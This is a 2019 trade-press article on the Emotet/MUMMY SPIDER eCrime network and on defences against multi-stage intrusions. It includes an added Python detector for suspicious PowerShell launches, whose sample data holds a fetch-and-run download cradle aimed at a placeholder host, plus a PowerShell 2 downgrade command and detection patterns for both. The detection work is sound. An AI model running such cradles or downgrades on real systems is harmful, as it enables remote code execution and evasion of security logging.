URL: https://www.information-age.com/ecrime-cyber-network-13708/
Information Age

Insight and Analysis for the CTO


CAUGHT IN THE SPIDER’S WEB: DEMYSTIFYING THE ECRIME CYBER NETWORK



by Editor's Choice, 9 May 2019

One thing was clear in 2018: law enforcement efforts have not yet halted or
deterred eCrime actors and their cybercrime campaigns. Throughout the year
CrowdStrike observed the rise of ‘Big Game Hunting’ tactics, targeted ransomware
deployed against large organisations in pursuit of a correspondingly large
financial payoff, along with a range of criminal adversaries engaging in notably
more aggressive intrusions.



eCrime was prominent in 2018. Adversaries operating within criminal networks
were tracked conducting a range of operations, including crimeware
distribution, banking trojans, ransomware, point-of-sale compromises and
targeted spear-phishing campaigns. However, one of the most concerning eCrime
trends was the solidification of a prominent eCrime ‘ecosystem’.

Much like nation-state adversaries, eCrime adversaries rarely work alone, and in
2018 the malware distribution threat MUMMY SPIDER solidified new and existing
relationships, cementing the reality of a serious eCrime ecosystem. MUMMY SPIDER
now sits at the centre of a web of advanced eCrime adversaries whose expertise
spans ransomware, point-of-sale malware and banking trojans. Collaboration
between these groups has only made the collective stronger, and to defeat them
we need to understand the entire network.

In order to untangle this web of e-criminals, we need to find the driver of the
network and understand their motivations and approaches to cyber-attacks, which
in turn will allow us to understand what connects these actors together – and
eventually cut the head off the snake.

THE HEAD OF THE SERPENT: MUMMY SPIDER

MUMMY SPIDER is the criminal entity linked to the core development of the
malware most commonly known as Emotet or Geodo. It first appeared in mid-2014
and swiftly became a formidable adversary by developing increasingly aggressive
forms of malware. It does not follow typical criminal behaviour patterns: it
usually conducts attacks for a few months, goes underground for a period of
three to 12 months, and then returns with a new malware variant.

In 2017, the adversary made a conscious shift away from operating Emotet as a
banking trojan and towards running it as a crimeware downloader service that
delivers other groups’ payloads. In 2018 it went further, making its malware
more resilient and thus more attractive to potential ‘customers’. MUMMY SPIDER
conducts regular waves of spam campaigns to spread Emotet, often themed around
invoices and payroll. Following infection, Emotet uses geo-targeting to decide
which payload to deliver to the victim machine. Over the summer of 2018, in
addition to supporting the download of TinyLoader, TrickBot and ZeuS Panda,
CrowdStrike Intelligence observed Emotet infections propagating MUMMY SPIDER’s
own SMB spreader to machines in the US, Canada, Germany, the UK, Japan and
Australia.

In 2018, MUMMY SPIDER solidified its eCrime stronghold, arming itself with a web
of pre-existing and new relationships with other adversaries. It continued
supporting WIZARD SPIDER (a Russia-based threat group) through the latter half
of the year, while adding geo-targeted distribution for BokBot (from LUNAR
SPIDER, an Eastern European-based operator and developer of banking malware) and
Gozi ISFB. INDRIK SPIDER (a sophisticated eCrime group that has operated Dridex
since June 2014) was also seen to continue its historic relationship with MUMMY
SPIDER during 2018, although downloads of Dridex by Emotet remain rare. Other
members of this established network include the individual operators behind
Panda Zeus, Nymaim and Gootkit.

INTO THE TANGLED WEB: WHY MULTIPLE SPIDERS ARE WORSE THAN ONE

To illustrate why a network of e-criminals presents a greater challenge for the
cyber-security industry, we can use a recent example of MUMMY SPIDER activity.
In November 2018, a significant phishing campaign was identified that was having
widespread effects. Based on the sheer volume of victims, it turned out to be
one of the largest Emotet campaigns ever observed by a cyber-security firm, and
CrowdStrike was able to attribute the activity with high confidence to MUMMY
SPIDER. (CrowdStrike uses the ‘SPIDER’ suffix in its naming convention to
identify eCrime groups around the globe.)

The MUMMY SPIDER phishing campaign consisted of a malicious macro-enabled
Microsoft Word document sent as an email attachment. When a recipient opened the
weaponised document on a machine where macros were enabled, which is still
common, the macro launched an obfuscated PowerShell command. That command
fetched an Emotet dropper from remote command-and-control (C2) infrastructure,
and the dropper installed the Emotet malware as the first-stage implant. Once
the host was infected, further malware was delivered to it according to its
geographic location.

Where the ecosystem came into play was the second-stage malware download. One of
the downloads, TrickBot, is attributed to the eCrime actor group WIZARD SPIDER.
The other second-stage download, BokBot, is attributed to the eCrime actor LUNAR
SPIDER. What the intelligence tells us is that these groups cooperate with MUMMY
SPIDER to gain access to Emotet’s victims. MUMMY SPIDER breaks down the door
into a weakly defended system and then lets its partners follow it in, each
running its own criminal operation on the compromised host while it remains
exposed.

Furthermore, the spider’s web does not stop with MUMMY SPIDER’s immediate
associates; we must also consider the further connections these groups have.
For instance, INDRIK SPIDER has known connections to TINY SPIDER and SKELETON
SPIDER, both of which benefit from malware distributed by INDRIK SPIDER.

DON’T GET ENSNARED: AVOID FALLING INTO THE ECRIME WEB

Whilst the web of e-criminals may seem daunting, there is a range of best
practices that businesses can adopt to protect themselves against these
multi-stage attacks. If the first adversary cannot break through your defences,
its partners never get their second-stage foothold either:

• Develop a post-recovery strategy: Recovery is not the last step in remediating
a ransomware attack, as this event clearly illustrates. Organisations need to
know how the adversary got in before they can be sure it has been successfully
ejected.

• Build an incident response plan: Review and test the plan to make sure it is
up to date and relevant to the threats facing your organisation. Running
tabletop simulations improves reaction times, and having an incident response
retainer in place ensures you have relevant support when you need it.

• Upgrade operating systems: CrowdStrike constantly sees organisations
compromised because they haven’t upgraded to supported operating systems or
applied relevant critical patches. The savings gained by stretching the life of
an outdated system are not worth the risks. Bolstering your defences around
these devices can provide some additional protection while working on the
upgrade plan.

• Upgrade to PowerShell v5 and remove previous versions: Windows PowerShell 5
added script block logging, which records the de-obfuscated content of every
script block as it executes (Event ID 4104 in the
Microsoft-Windows-PowerShell/Operational log), so a security team that collects
those events can see commands such as the obfuscated launcher described above
as they run and respond right away. Deploy v5 and enable script block logging
across the enterprise, and remove the PowerShell 2.0 engine, which ships as an
optional Windows feature: while it is installed, an attacker can run
powershell.exe -Version 2 and execute under the old engine, which has no script
block logging, a downgrade that defeats the whole investment. The same applies
to other applications on your network: security hygiene is a key to success in
improving how your network operates.

• Leverage multi-factor authentication (MFA) for all users and privileged access
management (PAM) tools: Make it as difficult as possible for adversaries to
obtain and use both user and admin credentials from outside your network; once
they hold those, they can do whatever they want in the environment. In addition
to MFA, a more robust privileged access management process limits the damage
adversaries can do if they get in.
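The delivery chain described above (Office macro, obfuscated PowerShell launcher, remote download of the Emotet dropper) and the PowerShell downgrade called out in the list both leave a trace in process-creation telemetry. The following Python is an added example, not CrowdStrike's code or anything from the original article: it scores constructed process-creation records for an Office parent spawning PowerShell, an -EncodedCommand blob (decoded from its UTF-16LE base64 so that a download cradle hidden inside it can be matched), a hidden window, and a -Version 2 downgrade. The three-field record layout and its field names are an assumption for illustration, not any product's schema, and the sample command lines and the example.invalid URL are constructed.

```python
"""Score PowerShell launches for Emotet-style delivery and logging downgrades.

Added example (not CrowdStrike's or Information Age's code). Events are
constructed process-creation records with three fields (parent image, image,
command line); the field names are an assumption for illustration, not any
product's schema.
"""
import base64
import binascii
import ntpath
import re
from dataclasses import dataclass, field
from typing import List, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
ALERT_THRESHOLD = 4

# -EncodedCommand and its accepted prefixes (-e, -ec, -en, -enc) followed by base64.
ENCODED_RE = re.compile(
    r"(?:^|\s)-e(?:c|n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# name -> (pattern run over the raw and the decoded command line, weight)
INDICATORS = {
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "no_profile": (re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    "execution_bypass": (re.compile(r"-(?:ep|exec(?:utionpolicy)?)\s+bypass", re.I), 1),
    # '-version 2' selects the PowerShell 2.0 engine, which has no script block logging
    "powershell_downgrade": (re.compile(r"-v(?:ersion)?\s+2(?:\.0)?\b", re.I), 4),
    "download_cradle": (re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest"
        r"|\bIEX\b|Invoke-Expression|Start-BitsTransfer", re.I), 3),
}


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    event: ProcessEvent
    indicators: List[str] = field(default_factory=list)
    decoded_command: Optional[str] = None
    score: int = 0


def decode_encoded_command(blob: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; None if it is not that."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(event: ProcessEvent) -> Finding:
    """Weight the indicators present on one PowerShell process-creation event."""
    finding = Finding(event=event)
    if ntpath.basename(event.image).lower() not in POWERSHELL_IMAGES:
        return finding  # only PowerShell launches are scored

    def hit(name: str, weight: int) -> None:
        finding.indicators.append(name)
        finding.score += weight

    # Office spawning PowerShell is the macro-to-launcher step of the chain.
    if ntpath.basename(event.parent_image).lower() in OFFICE_PARENTS:
        hit("office_parent", 5)

    match = ENCODED_RE.search(event.command_line)
    if match:
        hit("encoded_command", 2)
        finding.decoded_command = decode_encoded_command(match.group(1))

    # Download cradles usually hide inside the encoded blob, so scan both texts.
    haystack = event.command_line + "\n" + (finding.decoded_command or "")
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(haystack):
            hit(name, weight)
    return finding


def scan(events: List[ProcessEvent]) -> List[Finding]:
    """Return the findings that reach the alert threshold."""
    return [f for f in map(analyze, events) if f.score >= ALERT_THRESHOLD]


# Constructed sample telemetry; the URL uses the reserved .invalid TLD.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 f"powershell.exe -nop -w hidden -enc {SAMPLE_ENCODED}"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -version 2 -nop -ep bypass -c "Get-Process"'),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"),
]


def main() -> None:
    for finding in scan(SAMPLE_EVENTS):
        print(f"score={finding.score:2d} {finding.indicators}")
        if finding.decoded_command:
            print(f"   decoded: {finding.decoded_command}")


if __name__ == "__main__":
    main()
```

Run it directly and the first two sample events alert while the signed backup script does not. In practice the same scoring runs over Sysmon Event ID 1 or EDR process events, and the decoded command line is what script block logging (Event ID 4104) would also give you once PowerShell 5 is in place; the weights are illustrative, with an Office parent alone clearing the threshold because there is rarely a legitimate reason for Word to start PowerShell.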

There are many things that can be done to reduce the risk of intrusion, and
employee awareness programmes can also help. If you do not have all the
resources you need, consider working with a third party that offers services
such as tabletop exercises, compromise assessments and incident response
retainers to test your maturity and, hopefully, reduce or prevent incidents in
your environment.

Written by John Titmus, director EMEA at CrowdStrike
